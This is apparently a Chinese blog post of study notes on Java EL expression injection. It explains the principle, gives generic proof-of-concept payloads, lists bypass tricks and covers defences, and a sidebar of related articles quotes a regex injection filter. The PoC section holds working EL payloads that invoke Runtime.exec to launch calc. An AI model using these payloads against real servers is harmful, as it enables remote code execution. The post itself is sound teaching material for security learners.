9、表达式注入漏洞

已于 2024-01-08 17:12:41 修改
阅读量617 收藏 17
点赞数 15
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享 其他
于 2024-01-08 17:03:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135461867
版权

1、概述

1.1、定义

表达式注入漏洞类似远程代码执行漏洞(原理上),但远程代码执行漏洞是直接注入代码原生语句,而表达式注入漏洞是基于代码之上构建的执行逻辑。

一定意义上,表达式是代码的浓缩,同时也具备像代码一样可被执行的属性。

Java语言方面的表达式EL(Expression Language),主要包括一下内容:

  • SpEL表达式(Spring)
  • OGNL表达式(Struts2、Confluence)

1.2、EL简介

EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。

EL表达式的主要功能有:

  • 获取数据
  • 执行运算
  • 获取Web开发常用队形
  • 调用Java方法

2、漏洞分析

2.1、原理

表达式外部可控导致攻击者可以注入恶意表达式来实现任意代码执行。

EL表达式注入漏洞的外部可控点一般是在Java程序代码中,即Java程序中的EL表达式内容全部或部分是从外部获取的。

2.2、通用Poc

//对应于JSP页面中的pageContext对象(注意:取的是pageContext对象)
${pageContext}

//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

//文件头参数
${header}

//获取webRoot
${applicationScope}

//执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

比如在Java程序中可以控制输入EL表达式如下:

${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

如果该EL表达式直接在JSP页面中执行,则触发任意代码执行漏洞

但是在实际场景中,是几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。

2.3、绕过

  1. 反射
  2. unicode
  3. 八进制

3、漏洞挖掘

使用工具进行扫描

4、漏洞防御

  1. 尽量不使用外部输入的内容作为EL表达式内容
  2. 若使用,需严格过滤EL表达式注入漏洞的payload关键字
  3. 排查Java程序中JUEL相关代码,可以搜索下面的关键类方法:
javax.el.ExpressionFactory.createValueExpression()
javax.el.ValueExpression.getValue()

5、实验

实验12

可以参考下面的文章学习

表达式注入漏洞复现

DarkByte-
关注
  • 15
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP防止SQL注入与几种正则表达式讲解
12-15
注入漏洞代码和分析   代码如下: <?php function customerror($errno, $errstr, $errfile, $errline) { echo error number: [$errno],error on line $errline in $errfile; die(); } set_error_handler(customerror,e_error); $getfilter='|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|< \s*script\b|\bexec\b|unio
Java表达式注入(OGNL 表达式注入
GalaxySpaceX的博客
08-23 1398
Java表达式注入(OGNL 表达式注入
SpEL表达式注入漏洞学习
weixin_45794666的博客
03-09 3044
SpEL表达式注入漏洞 前言 因为前端时间的spring gateway rce正是由此导致的所以来学习一下 介绍 Spring Expression Language(简称SpEL)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于统一EL,但提供了额外的功能,是方法调用和基本的字符串模板了同时SpEL是API接口的形式因为创建的,所以允许将其集成到其他应用程序和框架中。 环境搭建 https://github.com/LandGrey/SpringBootVulExploit/tree
php防止sql注入示例分析和几种常见攻击正则表达式
10-26
主要介绍了php防止sql注入漏洞代码和分析,最近提供了几种常见攻击的正则表达式,大家参考使用吧
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
Java安全-注入漏洞(SQL注入、命令注入表达式注入、模板注入
Love&Share
11-07 9874
文章目录注入SQL注入JDBC拼接不当造成SQL注入框架使用不当造成SQL注入安全的反射命令注入代码注入表达式注入Spel表达式注入OGNL表达式注入模板注入 注入 SQL注入 JDBC拼接不当造成SQL注入 JDBC有两种方法执行SQL语句,分别为PrepareStatement和Statement。两个方法的区别在于PrepareStatement会对SQL语句进行预编译,而Statement方法在每次执行时都需要编译,会增大系统开销。理论上PrepareStatement的效率和安全性会比Stat.
EL表达式
顺其自然~专栏
09-22 299
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
自动化漏洞扫描工具Goby介绍、下载、使用、插件、功能
热门推荐
huangjun的博客
06-08 1万+
漏洞页面中右上角点击+POC即可自定义POC。PoC管理两个页面,一个是漏洞信息,一个是测试。先来看看这三个输入框,名称、查询规则、等级。以Apache Kylin config 未授权配置泄露漏洞为例。名称是这个Poc的漏洞名称,比如Apache Kylin config 未授权配置泄露。查询规则app=Apache Kylin config。(这里的规则可以参考fofa语句)。等级分为严重,高危,中危,低危。再来看看测试页面。再来配置下请求包HTTP请求方法:GET。
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
chaojixiaojingang
04-06 7535
1.漏洞描述 SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
【web安全】Spel表达式注入漏洞
一个程序员
01-26 1596
例如,可以执行恶意构造的表达式或者执行类实例对象。在练习靶场的时候遇到了spel表达式注入的题目,这篇文章主要是学习总结一下spel表达式的相关知识点,然后进一步学习spel表达式相关漏洞,了解如何利用改漏洞或者代码审计找到相关漏洞。笔者一开始想直接从spel表达式漏洞入手,可是发现许多描述都不理解,我的java用的不是很多,也不知道表达式的作用是啥,于是我们先学习一下spel表达式使用的知识,再学习相关漏洞。spel表达式如果接收外来的参数, 一定要考虑对于非法输入的过滤, 否则会产生注入漏洞
Struts2 使用OGNL表达式
06-01
NULL 博文链接:https://chaoyi.iteye.com/blog/2158731
STRUTS2类型转换错误导致OGNL表达式注入漏洞分析1
08-08
1、 jsp中得request.getAttribute(“kxlzx”) 2、 struts标签库几乎所有标签,在获取标签value时,都会调用这个方法 3、
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
SPEL表达式注入漏洞
最新发布
weixin_50217210的博客
03-11 1830
SPEL,全称为Spring表达式语言,是一个由 Spring 框架提供的表达式语言。它是一种基于字符串的表达式语言,可以在运行时对对象进行查询和操作。SpEL 支持在XML和注解配置中使用,它可以在Spring框架的各种组件中使用,如Spring MVC 控制器、Spring Security 安全框架、Spring Data 数据访问框架等。它可以方便地访问对象的属性、调用对象的方法、进行数学运算、逻辑运算、正则表达式匹配等操作。
Java表达式注入(SpEL表达式注入
GalaxySpaceX的博客
08-18 923
Java表达式注入(SpEL表达式注入
SpEL 表达式注入漏洞
m0_61506558的博客
10-31 585
在Spring系列产品中,SpEL是表达式计算的基础,实现了与Spring生态系统所有产品无对接。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEL可以方便快捷的对中的Bean进行属性的装配和提取。由于它能够在运行时动态分配值,因此可以为我们节省大量Java代码。使用Bean的ID来引用Bean可调用方法和访问对象的属性可对值进行算数、关系和逻辑运算可使用正则表达式进行匹配可进行集合操作。
spring依赖注入 注入值 spring表达式
justinLOLxsj的博客
01-07 1065
依赖注入 方式一 使用set方式注入 方式二 构造器方式注入 方式三 自动装配 注入注入基本类型的值 注入集合类型的值 将集合类型的值配置成一个bean 引用的方式注入集合类型的值 读取配置文件
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值